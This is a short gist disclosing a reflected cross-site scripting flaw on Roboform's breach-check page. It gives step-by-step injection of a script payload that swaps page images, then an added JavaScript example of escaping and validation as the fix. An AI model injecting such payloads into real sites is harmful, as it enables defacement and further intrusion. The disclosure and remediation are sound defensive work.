@AlekseyKorzun
Last active March 19, 2017 00:53
Roboform XSS
Credit to Paul Moore / @Paul_Reviews:
1. Navigate to http://www.roboform.com/have-i-been-hacked
2. Replace 'Enter account to test' with the following: <script type="text/javascript">$('img').attr('src', 'https://lastpass.com/images/lastpass-logo.png');</script>
3. Click on 'Check Now'
In action:
http://g.recordit.co/oBk26XEv0P.gif
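
The steps above work because the submitted account value ends up in the page as markup. The following is an added example, not Roboform's code and not part of the original gist: it contrasts a template that concatenates the value unchanged with one that validates and HTML-encodes it. The function names, the result markup and the assumption that the field expects a username or e-mail address are hypothetical.

```javascript
// Added example; function names and markup are hypothetical, not Roboform's code.
// Constructed sample input: the string from step 2 of the gist.
const SAMPLE_INPUT =
  "<script type=\"text/javascript\">$('img').attr('src', " +
  "'https://lastpass.com/images/lastpass-logo.png');</script>";

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can change HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": the submitted value is concatenated into markup unchanged,
// so any tags it contains become part of the page.
function renderResultUnsafe(account) {
  return '<p class="result">Result for ' + account + '</p>';
}

// "After": the same template with output encoding applied at the sink.
function renderResultSafe(account) {
  return '<p class="result">Result for ' + escapeHtml(account) + '</p>';
}

// Allow-list check (assumption: the field expects a username or e-mail address).
function isPlausibleAccount(account) {
  return typeof account === 'string' &&
    account.length > 0 && account.length <= 254 &&
    /^[A-Za-z0-9._%+-]+(@[A-Za-z0-9.-]+)?$/.test(account);
}

// Handler: reject input that fails validation, and encode on output regardless.
function handleCheck(account) {
  if (!isPlausibleAccount(account)) {
    return { status: 400, body: renderResultSafe('(invalid account)') };
  }
  return { status: 200, body: renderResultSafe(account) };
}

console.log(renderResultSafe(SAMPLE_INPUT)); // tags arrive as inert text
console.log(handleCheck(SAMPLE_INPUT).status);
```

Encoding at the point of output is the control that matters here; the allow-list check only narrows what reaches the template.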